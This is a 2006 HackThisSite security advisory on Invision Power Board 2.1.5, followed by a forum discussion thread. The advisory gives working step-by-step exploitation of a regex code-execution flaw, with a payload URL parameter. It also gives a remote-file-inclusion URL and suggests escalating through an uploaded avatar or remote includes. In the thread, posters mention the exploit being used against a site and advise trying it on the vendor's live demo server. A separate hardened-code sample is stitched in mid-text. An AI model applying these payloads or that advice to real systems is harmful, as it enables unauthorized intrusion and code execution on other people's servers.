Several Invision Flaws (2.1.5 and possibly earlier)
---------------------------------------------------
IceShaman & Wells
HackThisSite.org
1) Code execution
sources/action_public/search.php line 1261
$this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
The input string is not properly sanitized which can lead to arbitrary code execution.
Example exploit:
- Post in a forum with "eval(die()); //" somewhere in the body of the post
- Use the search form to search for the text "die" by your username only (so only one result shows);
make sure "Show results as posts" is selected.
- Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press return
- The code should have been executed
The lastdate string alters the regex to accept anything inside eval() and parse it as code, as
an #e modifier is added and then %00 used which will be parsed as a null byte and truncate
the string thus removing the original )#i part.
Due to selected='selected' also being executed as php code a space and // has to be used to turn
the text into a comment so it will be ignored by PHP.
As you can see this is just the beginning. You can upload an avatar with php code somewhere in it
and change the above example to include() it, thus running as much PHP code as you like. On default
PHP setups you can also include() remote files.
2) Remote file inclusion (requires admin)
sources/action_admin/paysubscriptions.php line 282
$gateway = trim( $this->ipsclass->input['name'] );
The input string is not properly sanitized and can be used to traverse directories in
this later include on line 307:
require_once( ROOT_PATH . 'sources/classes/paymentgateways/class_gw_'.$gateway.'.php' );
This code may look safe as the prefix to the file is hardcoded, unfortunately the backspace
character may be used to remove this prefix thus allowing ../../ combinations to execute code
from any file ending in .php.
Example: http://host/admin.php?adsess=...&section=content&act=msubs&code=install-gateway&name= http://www.host.com/index.php?act=task&ck='
Although this is limited to 32 characters, it still may pose a risk in certain circumstances.
Flaws researched by IceShaman and Wells
Flaw #1 was first discovered by "securicore" security group and used to exploit my forums. This led
to me doing a quick audit of the code to find it (it goes without saying that I succeeded).
- IceShaman
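A hardened form of the flaw #1 replacement, added here as an example and not code from the advisory or from IPB; LASTDATE_OPTIONS and the function names are assumptions. It validates the parameter against a fixed option list before anything reaches the regex, and escapes the needle with preg_quote() so request data can never alter the pattern.

```php
<?php
// Added example, not IPB's code: a hardened version of the flaw #1
// preg_replace. LASTDATE_OPTIONS and the function names are assumptions.
declare(strict_types=1);

// Fixed list of accepted "lastdate" values (hypothetical). The request
// value must match one of these exactly before it is used anywhere.
const LASTDATE_OPTIONS = ['0', '1', '7', '30', '90', '365'];

// Validate first: the parameter must be an integer from the option list.
// Anything else (a '#', a '\0', a trailing modifier) falls back to default.
function sanitize_lastdate(mixed $raw, string $default = '0'): string
{
    if (!is_string($raw) && !is_int($raw)) {
        return $default;
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT);
    if ($value === false || !in_array((string) $value, LASTDATE_OPTIONS, true)) {
        return $default;
    }
    return (string) $value;
}

// Mark the selected <option>. Even with a validated value the needle is
// passed through preg_quote() with the same delimiter, and no /e modifier
// is used, so request data can never change the pattern itself.
function mark_selected(string $html, string $lastdate): string
{
    $needle  = preg_quote($lastdate, '#');
    $pattern = "#(value=[\"']" . $needle . "[\"'])#i";
    return preg_replace($pattern, "\\1 selected='selected'", $html);
}

// Constructed sample markup and checks.
$form = "<option value='0'>Any date</option><option value='7'>Last week</option>";

assert(mark_selected($form, sanitize_lastdate('7'))
    === "<option value='0'>Any date</option><option value='7' selected='selected'>Last week</option>");
// Values that would alter the pattern are rejected before the regex runs.
assert(sanitize_lastdate("7)#e\0") === '0');
assert(sanitize_lastdate('7abc') === '0');
assert(sanitize_lastdate(7) === '7');
echo "all checks passed\n";
```

Run with `php -d zend.assertions=1 example.php` so the assertions are actually evaluated.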
Invision Power Board <= 2.1.5 Multiple Vulnerabilities
#1
Posted 25 April 2006 - 03:51 PM
#2
Posted 26 April 2006 - 08:30 AM
#3
Posted 26 April 2006 - 03:37 PM
#4
Posted 26 April 2006 - 03:41 PM
#5
Posted 26 April 2006 - 03:54 PM
So do I, considering someone already tried to run the exploit today, :S, and I'm fairly sure it's a simple patch; filtering out # signs would have fixed it, or if we actually knew what (and how) the variable was used you could probably just filter it properly....my guess would be that it has to be an integer, so just running it through intval() should have been enough, but ah well...hope GSO is patched!
Has anyone tested the second flaw successfully? I haven't been able to get any characters deleted by using the backspace char (on my own test script, so it may work on IPB or some random PHP installs or something).....
#7
Posted 27 April 2006 - 04:48 AM
#8
Posted 27 April 2006 - 05:41 AM
Damn, I can't even see what they wrote; zone-h is down.
#9
Posted 27 April 2006 - 06:22 AM
And secondly, the regex exploit is a very good job; I want to congratulate the guys from hackthissite who found the security flaws.
About hacking GSO, I think they were waiting for this day.
setthesun me = new setthesun();
#10
Posted 27 April 2006 - 06:25 AM
#11 Guest_Paul_*
Posted 27 April 2006 - 06:28 AM
#12
Posted 27 April 2006 - 12:50 PM
I was already like WTF?? when I tried to access the site this morning and got a htaxx question. lol, no legal box to try this on tho.
You can test it on the official IPB demo site; it resets every hour.
#13
Posted 27 April 2006 - 01:01 PM
#14
Posted 27 April 2006 - 01:03 PM
#15
Posted 06 February 2012 - 02:42 AM